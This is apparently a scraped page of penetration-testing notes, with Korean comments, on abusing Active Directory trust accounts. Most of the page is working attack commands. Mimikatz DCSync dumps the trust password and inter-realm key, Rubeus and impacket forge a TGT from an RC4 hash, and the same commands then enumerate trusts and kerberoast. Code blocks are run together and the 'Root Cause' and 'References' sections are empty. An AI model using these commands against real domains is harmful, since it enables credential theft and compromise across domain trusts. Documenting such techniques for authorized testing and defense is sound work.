Trust Account TGT
Abuse
# TDO GUID 열거
Get-ADObject -Filter 'objectClass -eq "trustedDomain"'
# 신뢰 패스워드 덤프
.\mimikatz.exe "lsadump::dcsync /guid:{f2599de1-3401-41dc-967a-80f50343cf1e} /domain:PENTEST.LOCAL" "exit"
# 트러스트 도메인 SID 열거
.\mimikatz.exe "lsadump::trust" "exit"
# 티켓 생성
.\Rubeus.exe asktgt /user:pentest$ /domain:contoso.com /rc4:ae8ac45464d823b0549450e3e803151f /nowrap /ptt
# 커버로스팅 등의 도메인 공격
.\Rubeus.exe kerberoast /domain:contoso.comimport base64
import uuid
# base64 문자열
b64_guid = ''
raw_bytes = base64.b64decode(b64_guid)
guid = str(uuid.UUID(bytes_le=raw_bytes))
print("GUID:", guid)# TDO GUID 열거
ldapsearch -x -H ldap://192.168.1.9 -D "[email protected]" -w "Password123!" -b "dc=pentest,dc=local" "(objectClass=trustedDomain)" objectGUID
python3 guiddecode.py
# Inter-realm Key 덤프
.\mimikatz.exe "lsadump::dcsync /domain:PENTEST.LOCAL /guid:{f2599de1-3401-41dc-967a-80f50343cf1e}"
# 티켓 생성
impacket-getTGT contoso.com/PENTEST$ -hashes ':ae8ac45464d823b0549450e3e803151f' -dc-ip '192.168.1.11'
export KRB5CCNAME=PENTEST$.ccache
# 커버로스팅 등의 도메인 공격
impacket-GetUserSPNs contoso.com/'PENTEST$'@192.168.1.11 -k -no-passRoot Cause


References
Last updated

